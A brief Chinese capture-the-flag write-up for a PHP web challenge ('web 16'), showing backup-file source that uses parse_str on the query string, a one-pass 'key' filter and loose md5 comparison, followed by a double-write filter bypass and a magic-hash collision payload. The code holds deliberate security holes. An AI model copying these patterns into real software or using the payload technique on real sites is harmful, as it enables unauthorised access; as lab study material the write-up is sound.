web 16
使用dirmap扫描到index.php.bak
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
这里有一个$_SERVER['REQUEST_URI']
,作用是获取url后面的东西
还有一个parse_str()
函数
有一个过滤,但是这种可以双写绕过$str = str_replace('key','',$str);
然后就是一个md5碰撞
payload:
?kekeyy1=QLTHNDT&kekeyy2=QNKCDZO